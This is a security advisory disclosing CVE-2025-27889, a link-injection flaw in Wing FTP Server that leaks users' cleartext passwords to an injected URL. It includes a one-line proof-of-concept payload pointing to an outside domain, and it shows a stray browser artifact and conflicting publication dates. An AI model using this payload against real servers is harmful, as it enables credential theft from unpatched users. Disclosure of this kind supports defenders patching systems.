Wing FTP Server Arbitrary Link Injection Leading to Cleartext Password Disclosure

ADVISORY INFORMATION

• Product: Wing FTP Server
• Vendor URL: https://www.wftpserver.com
• CWE: URL Redirection to Untrusted Site [CWE-601]
• Date found: 2025-03-10
• Date published: 2025-04-26
• CVSSv4 Score: 7.0 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N)
• CVE: CVE-2025-27889

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

WingFTP Server <= 7.4.2

INTRODUCTION

Wing FTP Server is a free, easy-to-use, and secure FTP server software for Windows, Linux, and Mac OS. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. And it provides admins with a web-based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive emailabout:blank#blocked notifications about various events taking place on the server.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The endpoint at “/downloadpass.html” is vulnerable to arbitrary link injection when processing the “url” parameter. An attacker needs to trick a victim into visiting the injected page by just following a link. Once the user enters their password on the resulting page and proceeds by hitting the “Submit” button, a vulnerable version of the Wing FTP server automatically appends the user’s clear-text password to the link injected via the “url” parameter.

Successful exploits can allow an unauthenticated attacker to steal a user’s clear-text password and subsequently compromise their account.

PROOF OF CONCEPT

A payload to exploit this vulnerability looks like the following:

/downloadpass.html?url=//rcesecurity.com/file%3fdownload%26weblink%3drcesec

SOLUTION

Update to version 7.4.3

REPORT TIMELINE

• 2025-03-10: Discovery of the vulnerability
• 2025-03-10: MITRE assigns CVE-2025-27889
• 2025-03-10: Contacted the vendor via their support@
• 2025-03-10: Vendor responds giving details on how to report the bug
• 2025-03-11: Sent full vulnerability details to the vendor
• 2025-03-11: Vendor confirms the vulnerability
• 2025-03-30: Vendor releases version 7.4.3 which fixes the vulnerability
• 2025-06-30: Full Disclosure

REFERENCES

• https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
• https://www.wftpserver.com